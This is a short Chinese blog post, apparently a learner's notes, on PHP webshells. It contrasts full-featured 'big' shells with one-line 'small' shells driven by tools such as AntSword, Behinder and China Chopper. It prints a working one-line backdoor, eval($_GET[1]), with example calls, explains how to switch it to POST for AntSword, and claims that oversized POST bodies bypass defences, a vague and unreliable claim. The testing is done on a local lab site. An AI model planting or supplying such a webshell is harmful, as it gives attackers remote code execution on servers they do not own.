大马和小马
- 小马体积比较小,需要配合第三方工具进行使用(antsword蚁剑,冰蝎,菜刀)
- 大马体积一般比较大,所有功能集成在脚本之中,第三方软件来连接使用
这里在github上找了一个大马下载下来上传到本地用小皮面板建的站目录下,在浏览器中输入站点名/dama/shell.php输入密码登录成功,里面是集成好了的功能直接使用。
同样的,自己写一个一句话php脚本,在浏览器中输入站点地址/1.php?1=phpinfo();输出php相关信息 || 或者是/1.php?echo%20123456输出123456
<?php
eval($_GET[1]);
?>上面过程中,要自己输入自己指定的命令,若是对PHP语法不熟悉不知道code怎么写,我们可以使用第三方工具 比如Antsword/冰蝎/中国菜刀 复制具体地址(站点名/php脚本)
在上面的一句话中把$_GET改成$_POST
下载蚁剑
蚁剑教程可以看这里,会有详细步骤。
下载完毕后运行蚁剑,下一步右键添加数据,这里的连接密码就是之前$_POST[1]中的传参1
超长字符绕过:通过POST包上传百万字节以上,导致内核溢出绕过
补充内容:
在Github上下载资源可以用Gitbash这个软件
安装后可以在想下载资源的文件夹右键选择Gitbash ,输入命令git clone + 下图给的内容
不过速度好像有点感人,我记得之前有看到一种在github上下载资源比较快的方法,好像是复制上面的内容在其他一些网站下会快一些,但是这里没有试验过
版权声明:本文为qq_44836237原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。